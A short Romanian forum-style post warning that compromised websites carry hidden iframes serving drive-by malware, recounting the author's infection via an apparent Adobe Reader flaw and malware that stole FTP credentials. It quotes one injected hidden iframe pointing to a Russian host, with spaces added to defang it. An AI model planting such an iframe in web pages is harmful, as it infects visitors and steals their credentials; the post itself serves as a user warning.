Din ce in ce mai multe site-uri sunt infectate cu niste scripturi dubioase. In codul paginilor am gasit iframe-uri care incarca si executa alte treburi:
<iframe src="http:// q5m.ru: 8080/index.php" width=123 height=111 style="visibility: hidden"></iframe> (am pus niste spatii in link, nu-l accesati)
M-am ales cu un virus in urma unei simple navigari pe internet. Voi da linkurile a catorva site-uri de genul daca va intereseaza.

In momentul cand am accesat site-ul respectiv am observat ceva ciudat. Mi-a aparut logo-ul de la Adobe Reader ca si cum se deschide un fisier PDF (pagina respectiva era in format php!). Am dat CTR + ALT + DEL si am gasit cateva procese ciudate. Deja virusul era "on" si-si facea treburile cu grija. Ce facea defapt acel virus? Fura datele de la conturile FTP care mai apoi le folosea pentru a infecta alte site-uri. Ce n-am inteles e cum a reusit sa se si deschida programelul (virusul), doar accesand o pagina PHP.
Nu mai stiu link-ul site-ului, insa am mai descoperit in urmatoarele zile alte cateva site-uri cu acelasi fenomen.
E posibil ca Adobe Reader sa aiba o gaura de securitate, si permite cumva executia si a fisierelor executabile, nu doar a fisierelor de format PDF.
Pe scurt, aveti grija la PDF-uri, nu intotdeauna Google avertizeaza ca "site-ul poate dauna calculatorului dumneavoastra".